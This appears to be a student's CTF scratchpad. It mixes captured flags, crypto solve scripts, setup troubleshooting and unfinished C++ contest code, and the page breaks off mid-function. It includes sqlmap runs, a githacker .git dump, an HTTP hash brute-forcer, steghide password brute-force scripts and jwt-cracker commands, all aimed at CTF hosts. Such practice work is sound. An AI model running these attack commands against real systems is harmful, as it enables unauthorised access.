```
┌──(kali㉿kali)-[~]
└─$ sudo apt install dirsearch
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package dirsearch
```

LoTuX{xXx0oORrR
super_secret_pw
super_secret_pw
LoTuX{xXx0oORrR_s1e3pr0c}

http://lotuxctf.com:20006/

githacker --url http://lotuxctf.com:20006/.git/ --output-folder result
git reset --hard e9dea4d8d3c8b8b24bcb031649fc0421d330b762

http://saturn.picoctf.net:50531/
http://saturn.picoctf.net:62217/

`psql -h saturn.picoctf.net -p 61426 -U postgres pico`
postgres
picoCTF{L3arN_S0m3_5qL_t0d4Y_31fd14c0}

![69502_0](https://hackmd.io/_uploads/ryNaO52xC.jpg)
![69503_0](https://hackmd.io/_uploads/B1N6O52eA.jpg)
![69501_0](https://hackmd.io/_uploads/ByVpd93lA.jpg)

https://1drv.ms/f/s!Am_dLlD2CRUbgdwaQoqE_YCTmnyhQg?e=dXVLip
https://play.picoctf.org/practice/challenge/115?category=4&page=1
cvpbPGS{c33xno00_1_f33_h_qrnqorrs}

```python
import requests
import hashlib
from datetime import datetime, timezone

username = "flagholder"
timestamp = '2022-12-26 20:59:48.231534'
dt = datetime.fromisoformat(timestamp)#.replace(tzinfo=timezone.utc)
sec = int(dt.timestamp())
usec = dt.microsecond
print(sec, usec)

url = 'http://challenge-190c8382bf9b0e7f.sandbox.ctfhub.com:10800/submission.php?hash='

def get_hash(sec, usec):
    # Candidate ID: username + hex seconds + hex microseconds, hashed with SHA-1
    user_id = f"{username}_{sec:08x}{usec:05x}"
    return hashlib.sha1(user_id.encode()).hexdigest()

# Walk backwards from the known timestamp one microsecond at a time
for i in range(0, 1000):
    hash = get_hash(sec, usec - i)
    r = requests.get(url + hash)
    print(i, hash)
    if r.text != "Submission not found.":
        print("Found hash:", hash)
        print(r.text)
        break
```

https://github.com/maple3142/My-CTF-Challenges.git
file: https://drive.google.com/file/d/1G-VtgJFEKcfN0Xj_wRZLLfXuoxPvR3tM/view?usp=sharing
https://docs.docker.com/engine/install/ubuntu/
https://drive.google.com/file/d/1mnng4xunujuw5jCK1udhEmD5fTFkdbdi/view?usp=sharing

Attaching to managementsystem_chal_1

```
└─$ python3 chall.py
Traceback (most recent call last):
  File "/home/kali/Documents/My-CTF-Challenges/AIS3 Pre-exam 2023/ECC/chall.py", line 1, in <module>
    from fastecdsa.curve import secp256k1
ModuleNotFoundError: No module named 'fastecdsa'
```

```python
import ast
import string
from collections import Counter

from fastecdsa.curve import secp256k1
from fastecdsa.point import Point
from fastecdsa.util import mod_sqrt


def lift_x(x, curve):
    # Recover both curve points that share the given x coordinate
    y_squared = (x * x * x + curve.a * x + curve.b) % curve.p
    y1, y2 = mod_sqrt(y_squared, curve.p)
    R1, R2 = Point(x, y1, curve=curve), Point(x, y2, curve=curve)
    return R1, R2


p = secp256k1.p
ciphertext = ast.literal_eval(open("output.txt").read())
c1s = [c1 for c1, _, _ in ciphertext]

# Known plaintext prefix "AI" gives the x coordinates of the first two key points
for k0P in lift_x(pow(ord("A"), -1, p) * c1s[0] % p, secp256k1):
    for k1P in lift_x(pow(ord("I"), -1, p) * c1s[1] % p, secp256k1):
        dP = k1P - k0P
        k2P_cand = k1P + dP
        if pow(k2P_cand.x, -1, p) * c1s[2] % p < 256:
            break

s = k0P
for c in c1s:
    print(chr(pow(s.x, -1, p) * c % p), end="")
    s += dP
```

https://drive.google.com/file/d/1cczdP1CntYpbMrU5kD_mf3_Gv3DNYTQe/view?usp=sharing

After confirming it is installed, copy and paste still did not work.
The reason is that the packages had not been installed inside the virtual machine.
Now run sudo apt install open-vm-tools
![](https://miro.medium.com/v2/resize:fit:952/1*oEAq6CyocxAo7ROIraoc2w.png)
Then run sudo apt install open-vm-tools-desktop
![](https://miro.medium.com/v2/resize:fit:958/1*KpVHKWscZt9XcmcOLb0S7g.png)
Once both are installed, you can copy and paste between the virtual machine and the host.

https://hackmd.io/@M3t30r/Bk4n4dkIn#Reverse
http://challenge-886c8d53738e2b28.sandbox.ctfhub.com:10800

```
└─$ sudo docker-compose up
sudo: docker-compose: command not found
```

```bash
sudo curl -L "https://github.com/docker/compose/releases/download/{docker-compose_version}/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose
```

starbugs

```bash
sudo curl -L "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
sudo curl -L "https://github.com/docker/compose/releases/download/1.27.3/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
```

```bash
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose
```

```
┌──(kali㉿kali)-[~/Documents/My-CTF-Challenges/AIS3 Pre-exam 2023/Login Panel-release]
└─$ sudo docker-compose up
Traceback (most recent call last):
  File "urllib3/connectionpool.py", line 677, in urlopen
  File "urllib3/connectionpool.py", line 392, in _make_request
  File "http/client.py", line 1252, in request
  File "http/client.py", line 1298, in _send_request
  File "http/client.py", line 1247, in endheaders
  File "http/client.py", line 1026, in _send_output
  File "http/client.py", line 966, in send
  File "docker/transport/unixconn.py", line 43, in connect
FileNotFoundError: [Errno 2] No such file or directory

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "requests/adapters.py", line 449, in send
  File "urllib3/connectionpool.py", line 727, in urlopen
  File "urllib3/util/retry.py", line 403, in increment
  File "urllib3/packages/six.py", line 734, in reraise
  File "urllib3/connectionpool.py", line 677, in urlopen
  File "urllib3/connectionpool.py", line 392, in _make_request
  File "http/client.py", line 1252, in request
  File "http/client.py", line 1298, in _send_request
  File "http/client.py", line 1247, in endheaders
  File "http/client.py", line 1026, in _send_output
  File "http/client.py", line 966, in send
  File "docker/transport/unixconn.py", line 43, in connect
urllib3.exceptions.ProtocolError: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "docker/api/client.py", line 205, in _retrieve_server_version
  File "docker/api/daemon.py", line 181, in version
  File "docker/utils/decorators.py", line 46, in inner
  File "docker/api/client.py", line 228, in _get
  File "requests/sessions.py", line 543, in get
  File "requests/sessions.py", line 530, in request
  File "requests/sessions.py", line 643, in send
  File "requests/adapters.py", line 498, in send
requests.exceptions.ConnectionError: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "bin/docker-compose", line 3, in <module>
  File "compose/cli/main.py", line 67, in main
  File "compose/cli/main.py", line 123, in perform_command
  File "compose/cli/command.py", line 69, in project_from_options
  File "compose/cli/command.py", line 132, in get_project
  File "compose/cli/docker_client.py", line 43, in get_client
  File "compose/cli/docker_client.py", line 170, in docker_client
  File "docker/api/client.py", line 188, in __init__
  File "docker/api/client.py", line 213, in _retrieve_server_version
docker.errors.DockerException: Error while fetching server API version: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))
[3361] Failed to execute script docker-compose
```

egrep -c '(vmx|svm)' /proc/cpuinfo

```python
a=[83,116,113,96,112,99,125,78,87,103,57,110,104,82,102,106,113,32,123,125,115,104]
b=''
for i in range(len(a)):
    b += chr(a[i]^i)
print (b)
```

Susctf{I_n3ed_hea1ing}

http://82.157.146.43:16820/
http://82.157.146.43:16962/
shellmates{7HE\_w3B\_is_w31RD}
https://ctf.bugku.com/challenges/detail/id/419.html
nc 82.157.146.43 15605

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

https://reurl.cc/136VmG

```
flag=open("flag","rb").read()
from Crypto.Util.number import getPrime,bytes_to_long
p=getPrime(1024)
q=getPrime(1024)
e=65537
n=p*q
m=bytes_to_long(flag)
c=pow(m,e,n)
print c,e,n
p=getPrime(1024)
e=65537
n=p*q
m=bytes_to_long("1"*32)
c=pow(m,e,n) print c,e,n ''' output: 2482083893746618248544426737023750400124543452082436334398504986023501710639402060949106693279462896968839029712099336235976221571564642900240827774719199533124053953157919850838214021934907480633441577316263853011232518392904983028052155862154264401108124968404098823946691811798952747194237290581323868666637357604693015079007555594974245559555518819140844020498487432684946922741232053249894575417796067090655122702306134848220257943297645461477488086804856018323986796999103385565540496534422406390355987976815450744535949785073009043007159496929187184338592859040917546122343981520508220332785862546608841127597 65537 14967030059975114950295399874185047053736587880127990542035765201425779342430662517765063258784685868107066789475747180244711352646469776732938544641583842313791872986357504462184924075227433498631423289187988351475666785190854210389587594975456064984611990461126684301086241532915267311675164190213474245311019623654865937851653532870965423474555348239858021551589650169602439423841160698793338115204238140085738680883313433574060243600028500600824624358473403059597593891412179399165813622512901263380299561019624741488779367019389775786547292065352885007224239581776975892385364446446185642939137287519945974807727 3829060039572042737496679186881067950328956133163629908872348108160129550437697677150599483923925798224328175594483217938833520220087230303470138525970468915511111320396185482564783975435346354440035776909781158407636044986403819840648379609630039348895415045723208843631191252142600667607807479954194447237061080618370787672720344741413537975922184859333432197766580150534457001196765621678659952108010596273244230812327182786329760844037149719587269632133595149294067490955644893402708720284179715002149224068928828656515326446881791228638008572889331511945042911372915003805505412099102954073299010951896955362470 65537 
14624662628725820618622370803948630854094687814338334827462870357582795291844925274690253604919535785934208081825425541536057550227048399837243392490762167733083030368221240764693694321150104306044125934201699430146970466657410999261630825931178731857267599750324918610790098952520113593130245010530961350592735239454337631927669542026935873535964487595433984902529960726655481696404006628917922241666148082741874033756970724357470539589848548704573091633917869387239324447730587545472564561496724882799495186768858324490838169123077051890332313671220385830444331578674338014080959653201802476516237464651809255679979
'''
```

http://atlas.picoctf.net:59692/

@CTF Player The competition starts in two days and runs 2024/04/27 08:00 ~ 2024/04/28 20:00. You can register on the platform ahead of time. There are two challenge platforms this time:
1. General platform: open to everyone, and you can register directly on the platform https://ctf-hobby.scint.org/
2. Prize-eligible platform: use the account and password we emailed you; only solves on this platform qualify for prizes https://ctf.scint.org/

http://23.146.248.36:10001/
https://blog.csdn.net/Blood_Seeker/article/details/81837571

```
#!/bin/bash
# bruteStegHide.sh
for line in `cat "$2"`;do
    steghide extract -sf "$1" -p "$line" > /dev/null 2>&1
    if [[ $? -eq 0 ]];then
        echo 'password is: '"$line"
        exit
    fi
done
```

```
# -*- coding: utf8 -*-
#author:pcat
#http://pcat.cnblogs.com
from subprocess import *

def foo():
    stegoFile='rose.jpg'
    extractFile='hide.txt'
    passFile='english.dic'

    errors=['could not extract','steghide --help','Syntax error']
    cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
    f=open(passFile,'r')

    for line in f.readlines():
        cmd=cmdFormat %(stegoFile,extractFile,line.strip())
        p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
        content=unicode(p.stdout.read(),'gbk')
        for err in errors:
            if err in content:
                break
        else:
            print content,
            print 'the passphrase is %s' %(line.strip())
            f.close()
            return

if __name__ == '__main__':
    foo()
    print 'ok'
    pass
```

```
# -*- coding: utf8 -*-
# author: pcat
# http://pcat.cnblogs.com
from subprocess import Popen, PIPE, STDOUT

def foo():
    stegoFile = 'rose.jpg'
    extractFile = 'hide.txt'
    passFile = 'english.dic'

    errors = ['could not extract', 'steghide --help', 'Syntax error']
    cmdFormat = 'steghide extract -sf "%s" -xf "%s" -p "%s"'

    with open(passFile, 'r') as f:
        for line in f:
            cmd = cmdFormat % (stegoFile, extractFile, line.strip())
            p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT)  # Capture both stdout and stderr
            output, _ = p.communicate()  # Wait for the process to complete and get output
            content = output.decode('utf-8', errors='ignore')  # Decode output bytes to Unicode
            for err in errors:
                if err in content:
                    break
            else:
                print(content)
                print('the passphrase is %s' % (line.strip()))
                return

if __name__ == '__main__':
    foo()
    print('ok')
```

潘志豪

```
C:\Users\mlsh\Desktop>node 123.js
(node:7156) Warning: To load an ES module, set "type": "module" in the package.json or use the .mjs extension.
```
```
(Use `node --trace-warnings ...` to show where the warning was created)
C:\Users\mlsh\Desktop\123.js:1
import fetch from 'node-fetch';
^^^^^^

SyntaxError: Cannot use import statement outside a module
    at internalCompileFunction (node:internal/vm:128:18)
    at wrapSafe (node:internal/modules/cjs/loader:1280:20)
    at Module._compile (node:internal/modules/cjs/loader:1332:27)
    at Module._extensions..js (node:internal/modules/cjs/loader:1427:10)
    at Module.load (node:internal/modules/cjs/loader:1206:32)
    at Module._load (node:internal/modules/cjs/loader:1022:12)
    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:135:12)
    at node:internal/main/run_main_module:28:49

Node.js v20.12.2
```

node --experimental-modules 123.mjs

```json
entry.2087702167: 1
entry.1046453724:
entry.873445036:
entry.1069330659: 是
entry.260776212: 是
entry.556240621: 是
entry.1367473080: 是
entry.713173595: 是 (鼓掌)
entry.60765576: 是
entry.1256805579: 是
dlut: 1714466646625
hud: true
entry.1069330659_sentinel:
entry.260776212_sentinel:
entry.556240621_sentinel:
entry.1367473080_sentinel:
entry.713173595_sentinel:
entry.60765576_sentinel:
entry.1256805579_sentinel:
fvv: 1
partialResponse: [[[null,1535541969,["2"],0],[null,1247921748,["1"],0]],null,"-2246547900846118749"]
pageHistory: 0,1
fbzx: -2246547900846118749
submissionTimestamp: 1714466650562
```

0x804932f

```
#include <iostream>
using namespace std;

int main() {
    int enc[] = {138, 80, 146, 200, 6, 61, 91, 149, 182, 82, 27, 53, 130, 90, 234, 248, 148, 40, 114, 221, 212, 93, 227, 41, 186, 88, 82, 168, 100, 53, 129, 172, 10, 100, 0};
    for(int i = 0; i<35; i++){
        enc[i]-=8;
        cout << (((enc[i]>>((i ^ 9) & 3)|enc[i]<<(8 - ((i ^ 9) & 3)))) & 255 ^i)<< " ";
    }
}
```

https://www.ezyzip.com/unzip-files-online.html

```python
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
import gmpy2
gmpy2.get_context().precision = 1024

def keygen(digits):
    count = 314159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848
    assert(10**(digits-1) <= count < 10**digits)
    n = 23662270311503602529211462628663973377651035055221337186547659666520360329842954292759496973737109678655075242892199643594552737098393308599593056828393773327639809644570618472781338585802514939812387999523164606025662379300143159103239039862833152034195535186138249963826772564309026532268561022599227047
    print('Lbound', count//3)
    print('Rbound', count//2)
    q_p = int(gmpy2.exp(gmpy2.log(count**2-n*4)/2))
    assert(q_p**2 == count**2-n*4)
    q = (count + q_p) // 2
    p = count - q
    assert(isPrime(p) and isPrime(q) and p*q == n)
    return p, q

p, q = keygen(153)
n = p*q
e = 65537
d = inverse(e, (p-1)*(q-1))
c = 11458615427536252698065643586706850515055080432343893818398610010478579108516179388166781637371605857508073447120074461777733767824330662610330121174203247272860627922171793234818603728793293847713278049996058754527159158251083995933600335482394024095666411743953262490304176144151437205651312338816540536
print('m =', long_to_bytes(pow(c, d, n)).decode())
```

https://isip-ctf.tyc4d.tw/challenges

```
└─$ sqlmap -u http://isip-ctf.tyc4d.tw:8003/
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.2#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:29:50 /2024-05-18/

[02:29:50] [INFO] testing connection to the target URL
[02:29:51] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:29:51] [INFO] testing if the target URL content is stable
[02:29:51] [INFO] target URL content is stable
[02:29:51] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--forms --crawl=2'
[02:29:51] [WARNING] your sqlmap version is outdated

[*] ending @ 02:29:51 /2024-05-18/
```

```
┌──(yih㉿kali)-[~]
└─$ sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --dbms mysql --level 3
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:10:12 /2024-05-18/

[03:10:13] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4441550f364...d6f137f352').
```
```
[03:11:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[03:11:03] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[03:11:04] [WARNING] parameter 'Referer' does not seem to be injectable
[03:11:04] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[03:11:04] [WARNING] your sqlmap version is outdated

[*] ending @ 03:11:04 /2024-05-18/
```

└─$ sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --dbms mysql --level 3

AIS3{c143f9818a01_Ju5t_a_s1mple_fl4g_ch3ck3r_r1gh7?}

```python
import cv2
import numpy as np
import threading
import time

net = cv2.dnn.readNet('yolov4.weights', 'yolov4.cfg')
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA_FP16)  # FP16 precision

with open('coco.names', 'r') as f:
    classes = [line.strip() for line in f.readlines()]

cap = cv2.VideoCapture(0)
confidence_threshold, nms_threshold = 0.1, 0.4

layer_names = net.getLayerNames()
output_layers = [layer_names[i - 1] for i in net.getUnconnectedOutLayers()]

frame = None

def capture_frames():
    global frame
    while True:
        ret, frame = cap.read()
        if not ret:
            break

# Daemon thread so the process can exit once the main loop ends
capture_thread = threading.Thread(target=capture_frames, daemon=True)
capture_thread.start()

prev_time = time.time()
while True:
    if frame is None:
        continue
    start_time = time.time()
    height, width, _ = frame.shape
    blob = cv2.dnn.blobFromImage(frame, 0.00392, (64, 64), swapRB=True)
    net.setInput(blob)
    outs = net.forward(output_layers)

    class_ids, confidences, boxes = [], [], []
    for out in outs:
        for detection in out:
            scores = detection[5:]
            class_id = np.argmax(scores)
            confidence = scores[class_id]
            if confidence > confidence_threshold and classes[class_id] == 'person':
                center_x, center_y = int(detection[0] * width), int(detection[1] * height)
                w, h = int(detection[2] * width), int(detection[3] * height)
                x, y = int(center_x - w / 2), int(center_y - h / 2)
                boxes.append([x, y, w, h])
                confidences.append(float(confidence))
                class_ids.append(class_id)

    indexes = cv2.dnn.NMSBoxes(boxes, confidences, confidence_threshold, nms_threshold)
    num_people_detected = len(indexes)
    # NMSBoxes returns an empty tuple when nothing is detected, so wrap it before flattening
    for i in np.array(indexes).flatten():
        x, y, w, h = boxes[i]
        label = str(classes[class_ids[i]])
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0,0,0), 2)
        cv2.putText(frame, label, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,0), 1)

    end_time = time.time()
    fps = 1 / (end_time - start_time)
    cv2.putText(frame, "Detected people: {}".format(num_people_detected), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 2)
    cv2.putText(frame, "FPS: {:.2f}".format(fps), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 2)
    cv2.imshow('frame', frame)
    if cv2.waitKey(1) == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()
```

```
.rodata:0000000000002080 key             dd 3A011001h, 4C4C1B0Dh, 3A0B002Dh, 454F40h, 3104321Ah
.rodata:0000000000002020 secret          db 'FAKE',0Bh,0         ; DATA XREF: main+38↑o
.rodata:0000000000002020                                         ; main+54↑o
```

```
for ( i = 0; i <= 23; i += 2 )
{
  v4 = *(_DWORD *)&secret[4 * i] ^ key[*(unsigned int *)&secret[4 * i + 4]];
  for ( j = 0; j <= 3; ++j )
  {
    sleep(0x3674u);
    printf("%c", v4);
    v4 >>= 8;
    fflush(_bss_start);
  }
}
```

https://prod.liveshare.vsengsaas.visualstudio.com/join?E60E72F6540F95F805A44FDD6106D2759A65

jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfT.AJyZI_UBNuQwjYuEpP0rsuLhc -a 1234567890abcdefghijklmnopqrstuwxyz --max 8
jwt-cracker -t eyJhbGci0iJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjpmYWxzZX0.wCcmSnz9QshOZboVDlYEI2LjkSk_Su4CYoS7DLqgXnY -a abcdefghijklmnopqrstuwxyz --max
jwt-cracker -t eyJhbGci0iJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjpmYWxzZX0.wCcmSnz9QshOZboVDlYEI2LjkSk_Su4CYoS7DLqgXnY

ssh -R yih0118.serveo.net:80:localhost:5500 serveo.net
https://1drv.ms/u/s!Am_dLlD2CRUbgfMIrAndkkYIuP00IA?e=Mlhird https://ctfd.tscctf.com/files/7793d37dec3912e018804e929cfc8b06/main.exe?token=eyJ1c2VyX2lkIjo3ODAsInRlYW1faWQiOm51bGwsImZpbGVfaWQiOjExfQ.Z4eM5w.7ov_vzqJEmp5p6pQreJ4VwFqmnM TSC{I_Think_you_Fix_2ome_3rror} https://ctfd.tscctf.com/files/9dd80380e6f50c0215678159805bee50/gate?token=eyJ1c2VyX2lkIjo3ODAsInRlYW1faWQiOm51bGwsImZpbGVfaWQiOjI1fQ.Z4eR5g.MasgXq-h6wfHSCZgP2AQHomITNI <!-- ![127732](https://hackmd.io/_uploads/rkKFnEX_yg.jpg) --> ![image](https://hackmd.io/_uploads/SJQtKf5Sxx.png) ``` #include <stdio.h> int main() { int n; scanf("%d", &n); for (int i = 0; i < n; i++) { int len = (i + 3 < n ? i + 3 : n); for (int j = 0; j < len; j++) { char ch = 'A' + (i + j) % n; putchar(ch); } putchar('\n'); } return 0; } ``` ![image](https://hackmd.io/_uploads/H1EZIQqreg.png) ``` #include <stdio.h> int main(void) { int n; int count[201] = {0}; // 身高範圍 0..200,初始化為 0 scanf("%d", &n); for (int i = 0; i < n; i++) { int height; scanf("%d", &height); count[height]++; // 統計每個身高出現次數 } int max_count = 0;幹娘 int max_height = 0; for (int i = 0; i <= 200; i++) { if (count[i] > max_count) { max_count = count[i]; max_height = i; } } printf("%d %d\n", max_height, max_count); return 0; } ``` ``` #include <stdio.h> #include <math.h> int main() { double a, b, c; scanf("%lf%lf%lf", &a, &b, &c); if (a == 0) { printf("不是拋物線"); return 0; } if (b*b - 4*a*c < 0) { printf("沒有實根"); return 0; } double ans1 = (-b + sqrt(b*b - 4*a*c)) / (2*a); double ans2 = (-b - sqrt(b*b - 4*a*c)) / (2*a); if (ans2>ans1){ printf("%.3lf, %.3lf\n", ans2, ans1); } else { printf("%.3lf, %.3lf\n", ans1, ans2); } return 0; } ``` ``` #include <stdio.h> #include <math.h> int main() { double a, b, c; scanf("%lf%lf%lf", &a, &b, &c); if (a == 0) { printf("不是拋物線\n"); return 0; } else if (b*b - 4*a*c < 0) { printf("沒有實根\n"); return 0; } else{ double ans1 = (-b + sqrt(b*b - 4*a*c)) / (2*a); double ans2 = (-b - sqrt(b*b - 4*a*c)) / (2*a); printf("%.3lf, %.3lf\n", ans1, ans2); } 
    return 0;
}
```

```
#include <bits/stdc++.h>
using namespace std;

int main() {
    double a, b, c, d;
    cin >> a >> b >> c;
    d = b*b - 4*a*c;
    if (a == 0) {
        cout << "不是拋物線" << "\n";
    }
    else if (d < 0) {
        cout << "沒有實根" << "\n";
    }
    else if (d > 0) {
        cout << fixed << setprecision(3) << (-b + sqrt(d)) / (2*a) << ", " << fixed << setprecision(3) << (-b - sqrt(d)) / (2*a) << "\n";
    }
    else
        cout << fixed << setprecision(3) << -b / (2*a) << ", " << fixed << setprecision(3) << -b / (2*a) << "\n";
    return 0;
}
```

```cpp=
#include <bits/stdc++.h>
using namespace std;

struct t {
    string name, gmail, p[3];
    int num, rank = 1E9;
    bool att = 0, nan, a = 0;
};

t team[154], final[40];

bool rank_cmp(t a, t b) {
    if (a.att != b.att) return a.att > b.att;
    return a.rank < b.rank;
}

bool name_cmp(t a, t b) {
    return a.name < b.name;
}

int main() {
    cin.tie(0), ios::sync_with_stdio(0);
    for(int i = 0; i < 154; i++) {
        cin >> team[i].name >> team[i].gmail >> team[i].num;
        for(int j = 0; j < team[i].num; j++) {
            cin >> team[i].p[j];
        }
        bool tmp;
        for(int j = 0; j < team[i].num; j++) {
            cin >> tmp;
            team[i].nan = max(tmp, team[i].nan);
        }
    }
    string name;
    for(int i = 0; i < 144; i++) {
        cin >> name;
        for(int j = 0; j < 154; j++) {
            if (team[j].name == name) team[j].rank = i;
        }
    }
    string gmail;
    int chuxi;
    for(int i = 0; i < 86; i++) {
        cin >> name >> gmail >> chuxi;
        // team[] holds 154 entries, so the scan must stop at 154
        for(int j = 0; j < 154; j++) {
            if (team[j].name == name && team[j].gmail != gmail) {
                cout << "-1\n";
                return 0;
            }
            else if (team[j].name == name) team[j].att = chuxi;
        }
    }
    sort(team, team + 154, rank_cmp);
    for(int i = 0 ; i < 154; i++) {
        if (team[i].name == "aiCJzzZXS") {
            cout << team[i].att << ' '<< i << '\n';
        }
    }
    int flag = 0, id;
    for(id = 0; id < 154; id++) {
        if (team[id].att) {
            final[flag++] = team[id], team[id].a = 1;
        }
        if (flag == 25) break;
    }
    int id2 = id;
    for(; id2 < 154; id2++) {
        if (team[id2].att && team[id2].nan && !team[id].a) {
            final[flag++] = team[id2];
        }
        if (flag == 36) break;
    }
    for(;id < 154; id++) {
        if (id < id2 && team[id].att && !team[id].nan && !team[id].a) {
            final[flag++] = team[id];
        }
        else if (team[id].att && !team[id].a) {
            final[flag++] = team[id];
        }
        if (flag == 40) break;
    }
    sort(final, final + 40, name_cmp);
    int sum = 0;
    for(int i = 0; i < 40; i++) sum += final[i].num;
    cout << sum << '\n';
    for(int i = 0; i < 40; i++) {
        cout << final[i].name << '\n';
    }
    return 0;
}
```

```cpp
#include <bits/stdc++.h>
using namespace std;

int main() {
    cin.tie(0), ios::sync_with_stdio(0);
    int n, q;
    cin >> n >> q;
    vector<int> a(n);
    vector<int> x(n);
    vector<int> wall(n);
    for (int i = 0; i < n; i++) {
        cin >> a[i];
    }
    for (int i = 0; i < n; i++) {
        cin >> x[i];
    }
    for (int i = 0; i < n; i++) {
        wall[a[i]] += x[i];
    }
    while (q--) {
        int l, r, k;
        cin >> l >> r >> k;
        vector<int> ans(r - l);
        for (int i = l; i <= r; i++) {
            ans.push_back(wall[i]);
            sort(ans.begin(), ans.end(), greater<int>());
            for (int i = 0; i < (int)ans.size(); i++) {
                if (ans[i] == 0) ans.pop_back();
            }
            sort(ans.begin(), ans.end());
        }
        if ((int)ans.size() > k) {
            cout << ans[ans.size() - k + 1] << "\n";
        }
        else {
            cout << -1 << "\n";
        }
    }
    return 0;
}
```

```cpp
#include <bits/stdc++.h>
using namespace std;

struct t {
    string name, gmail, p[3];
    int num, rank = 1E9;
    bool att = false, nan = false, a = false;
};

t team[154], final_list[40];

bool rank_cmp(const t &A, const t &B) {
    if (A.att != B.att) return A.att > B.att;
    return A.rank < B.rank;
}

bool name_cmp(const t &A, const t &B) {
    return A.name < B.name;
}

int main(){
    ios::sync_with_stdio(false);
    cin.tie(nullptr);

    // 1. Read in all teams
    for(int i = 0; i < 154; i++){
        cin >> team[i].name >> team[i].gmail >> team[i].num;
        for(int j = 0; j < team[i].num; j++){
            cin >> team[i].p[j];
        }
        // Read the gender flags (0/1)
        bool tmp;
        for(int j = 0; j < team[i].num; j++){
            cin >> tmp;
            team[i].nan = team[i].nan || tmp;
        }
    }

    // 2. Fill in the rankings
    string name;
    for(int i = 0; i < 144; i++){
        cin >> name;
        for(int j = 0; j < 154; j++){
            if(team[j].name == name){
                team[j].rank = i;
                break;
            }
        }
    }

    // 3. Read the attendance information and check the Gmail address
    string gmail;
    int chuxi;
    for(int i = 0; i < 86; i++){
        cin >> name >> gmail >> chuxi;
        bool found = false;
        for(int j = 0; j < 154; j++){
            if(team[j].name == name){
                found = true;
                if(team[j].gmail != gmail){
                    cout << "-1\n";
                    return 0;
                }
                team[j].att = chuxi;
                break;
            }
        }
        if(!found){
            cout << "-1\n";
            return 0;
        }
    }

    // 4. Sort by attendance, then by rank
    sort(team, team+154, rank_cmp);

    // (Debug output for one team)
    for(int i = 0; i < 154; i++){
        if(team[i].name == "aiCJzzZXS"){
            cout << team[i].att << " " << i << "\n";
        }
    }

    // 5. First pick the top 25 (attending)
    int cnt = 0, cutoff = 0;
    for(; cutoff < 154 && cnt < 25; cutoff++){
        if(team[cutoff].att){
            final_list[cnt++] = team[cutoff];
            team[cutoff].a = true;
        }
    }

    // 6. Then pick places 26 to 36: women first
    int id2 = cutoff;
    for(int j = cutoff; j < 154 && cnt < 36; j++){
        if(team[j].att && team[j].nan && !team[j].a){
            final_list[cnt++] = team[j];
            team[j].a = true;
        }
    }

    // 7. Fill up to 40: non-women first, then regardless of gender
    // 7a. Add non-women
    for(int j = cutoff; j < 154 && cnt < 40; j++){
        if(team[j].att && !team[j].nan && !team[j].a){
            final_list[cnt++] = team[j];
            team[j].a = true;
        }
    }
    // 7b. Add whoever remains
    for(int j = 0; j < 154 && cnt < 40; j++){
        if(team[j].att && !team[j].a){
